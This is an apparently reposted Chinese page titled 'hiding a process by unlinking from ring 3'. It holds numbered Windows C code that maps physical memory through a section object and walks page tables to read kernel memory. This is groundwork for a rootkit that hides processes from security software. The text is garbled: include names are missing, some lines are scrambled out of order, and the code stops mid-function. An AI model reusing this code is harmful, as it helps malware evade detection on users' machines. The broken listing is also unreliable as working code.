R3下摘链隐藏进程

2024年6月13日发(作者：)

001 #include

002 //#include

003 #include

004

005 typedef LONG NTSTATUS;

006

007 #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

008 #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

009 #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

010

011 typedef struct _UNICODE_STRING

012 {

013 USHORT Length;

014 USHORT MaximumLength;

015 PWSTR Buffer;

016 } UNICODE_STRING, *PUNICODE_STRING;

017

018 typedef struct _OBJECT_ATTRIBUTES

019 {

020 ULONG Length;

021 HANDLE RootDirectory;

022 PUNICODE_STRING ObjectName;

023 ULONG Attributes;

024 PVOID SecurityDescriptor;

025 PVOID SecurityQualityOfService;

026 } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

027

028 typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(

029 OUT PHANDLE SectionHandle,

030 IN ACCESS_MASK DesiredAccess,

031

032 IN POBJECT_ATTRIBUTES ObjectAttributes

033 );

034

035 typedef VOID (CALLBACK* RTLINITUNICODESTRING)(

036 IN OUT PUNICODE_STRING DestinationString,

037 IN PCWSTR SourceString

038 );

039

040 static bool ishide = false;

041 HANDLE hSection = NULL;

042 PVOID mapPhyMemObject = NULL;

043

044 PVOID LinerAddressToPhysicAddress(PULONG Base, PVOID address)

045 {

046 ULONG VAddress = (ULONG)address;

047 ULONG PDE,PTE,PAddress;

048 PDE = Base[VAddress>>22];

049 if((PDE&1)==0)

050 return 0;

051 ULONG PageFlage = PDE&0x00000080;

052 if (PageFlage != 0)

053 {

054 //PS位不为零，采用4MB分页方式

055 PAddress = (PDE&0xffc00000) + (VAddress&0x003fffff);

056 }

057 else

058 {

059 //PS位为零，采用4kb分页方式

060 PDE = (ULONG)MapViewOfFile(hSection,4,0,PDE&0xfffff000,0x1000);

061 PTE = ((PULONG)PDE)[(VAddress&0x003ff000)>>12];

062 if((PTE&1) == 0)

063 return 0;

064 PAddress = (PTE&0xfffff000)+(VAddress&0x00000fff);

065 UnmapViewOfFile((PVOID)PDE);

066 }

067 return (PVOID)PAddress;

068 }

069

070 ULONG GetData(PVOID addr)

071 {

072

ddr);

073 PULONG tmp =

(PULONG)MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&

0xfffff000,0x1000);

074 if(tmp == 0)

075 return 0;

076 ULONG ret = tmp[(phys&0xfff)>>2];

077 UnmapViewOfFile(tmp);

078 return ret;

ULONG phys =

(ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)a